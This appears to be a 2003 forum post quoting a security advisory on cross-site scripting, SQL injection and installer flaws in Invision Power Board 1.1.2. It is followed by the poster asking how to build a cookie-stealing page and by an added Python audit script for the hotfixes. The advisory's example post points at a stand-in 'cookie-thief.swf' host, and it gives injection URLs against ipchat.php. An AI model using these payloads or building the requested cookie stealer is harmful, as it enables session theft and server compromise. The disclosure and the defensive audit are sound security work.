reking
Aug 17 2003, 06:26 PM
QUOTE:
===========================================
Security REPORT Invision Power Board v1.1.2
===========================================

Product: Power Board v1.1.2 (maybe earlier Versions)
Vulnerabilities: cross site scripting, sql-injection, install- and admin-issues, os-command execution
Vuln.-Classes: Check out http://www.owasp.org/asac/ for more detailed information on "Attack Components"
Vendor: http://www.invisionboard.com/
Vendor-Status: contacted "info@invisionpower.com" on Jul. 11th 2003
Vendor-Patches: http://www.invisionboard.com/downloads/chat.zip

Exploitable:
Local: ---
Remote: YES
============
Introduction
============

Visit "http://www.invisionboard.com/" for additional information.

=====================
Vulnerability Details
=====================
1) CROSS-SITE-SCRIPTING
=======================

OBJECT: Post.php

DESCRIPTION: by using [FLASH=h,w][/FLASH]-tags within a posting (Post-textarea) it is possible to execute arbitrary client-scripts ... thus leading to cookie-theft.

The usage of flash tags is allowed per default in "conf_global.php":
---*---
$INFO['allow_flash'] = '1';
---*---

EXAMPLE-Content:
---*---
hey dude, whats up?
[flash=2,2]http://anotherhost.ext/cookie-thief.swf[/flash]
cu, jonnie
---*---
2) SQL-INJECTION
================

OBJECT: ipchat.php

DESCRIPTION: depending on mysql-version and/or drivers it is possible to change the result of sql-queries.

EXAMPLE (mySql > 4):
---*---
http://localhost/ibo/ipchat.php?password=1...n%2527,1%252f*+
---*---

EXAMPLE (with file-permission set):
---*---
http://localhost/ibo/ipchat.php?password=1...o+outfile+%2527[fullpath]%2527--+
---*---
3) INSTALLER-, ADMIN-ISSUES
===========================

If for some reason (permissions, directory-moving) the installer-lockfile (install.lock) is missing, any user can use the "sm_install.php" script.

Once administrator, one is able to:
A) execute arbitrary SQL-QUERIES through "admin.php/act=mysql/code=runsql/query=sq"
B) upload arbitrary files (including programs and scripts) into the "emoticons" directory.
... thus leading to a "total" compromise of the http-server's account.
=======
Remarks
=======

---

====================
Recommended Hotfixes
====================

Disallow flash in "conf_global.php". Check for installer-lockfile.
Software patch(es).

EOF Martin Eiszner / @2003 WebSec.org

=======
Contact
=======

WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org
Can anyone tell me how to create this cookie-thief.swf page (of course it doesn't have to be a flash file, can be anything as long as it works)?
I will of course not be using it here heh... I guess you're patched for that one anyway.
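The two hotfixes the quoted advisory recommends (turn off allow_flash in conf_global.php, make sure install.lock is present) as an added Python audit script; it is not part of the advisory or of the original post. The file names conf_global.php, install.lock and sm_install.php come from the advisory; the regexes, the audit logic and the constructed sample config are assumptions of this example.

```python
import os
import re
import tempfile

# Names come from the quoted advisory: conf_global.php holds $INFO['allow_flash'],
# and install.lock is what keeps sm_install.php from being re-run by anyone.
ALLOW_FLASH_RE = re.compile(
    r"""\$INFO\[\s*['"]allow_flash['"]\s*\]\s*=\s*['"]?(\d+)['"]?\s*;""")
FLASH_TAG_RE = re.compile(
    r"\[flash=\s*\d+\s*,\s*\d+\s*\](.*?)\[/flash\]", re.IGNORECASE | re.DOTALL)


def allow_flash_enabled(conf_text):
    """True if conf_global.php text enables [flash] tags, False if disabled, None if unset."""
    m = ALLOW_FLASH_RE.search(conf_text)
    return None if m is None else m.group(1) != "0"


def flash_tags_in_post(body):
    """Return the URLs carried by [flash=w,h]...[/flash] tags in one post body (detection)."""
    return [m.group(1).strip() for m in FLASH_TAG_RE.finditer(body)]


def audit_install(root):
    """Return a list of findings for a board tree whose root holds conf_global.php."""
    findings = []
    try:
        with open(os.path.join(root, "conf_global.php"), encoding="utf-8",
                  errors="replace") as fh:
            enabled = allow_flash_enabled(fh.read())
    except OSError:
        enabled = None
        findings.append("conf_global.php missing or unreadable")
    if enabled:
        findings.append("allow_flash is on: set $INFO['allow_flash'] = '0';")
    if not os.path.exists(os.path.join(root, "install.lock")):
        findings.append("install.lock absent: sm_install.php can be run by anyone")
    return findings


def demo():
    """Run the audit against a constructed tree: flash allowed, no lock file present."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "conf_global.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n$INFO['allow_flash'] = '1';\n?>\n")  # constructed sample config
    return audit_install(root)


if __name__ == "__main__":
    for line in demo():
        print(line)
```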